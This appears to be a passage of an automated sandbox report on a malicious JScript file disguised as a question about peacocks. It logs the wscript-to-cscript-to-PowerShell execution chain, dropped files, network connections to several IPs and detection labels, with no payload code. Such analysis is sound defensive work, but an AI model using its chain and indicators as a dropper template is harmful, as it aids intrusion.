https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/echarts/issues/14266
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsperf.com/try-catch-performance-overhead
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://momentjs.com/
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownHTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.67.130:443 -> 192.168.2.5:49717 version: TLS 1.2

          System Summary

          barindex
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 49%
          Source: is it legal to kill a peacock in california 93889.jsInitial sample: Strings found which are bigger than 50
          Source: classification engineClassification label: mal72.troj.expl.evad.winJS@13/9@3/3
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Insurance Negotiations.datJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxxrwmnz.m5k.ps1Jump to behavior
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js"
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE BALANC~1.JS
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
          Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE BALANC~1.JS
          Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
          Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"Jump to behavior
          Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
          Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
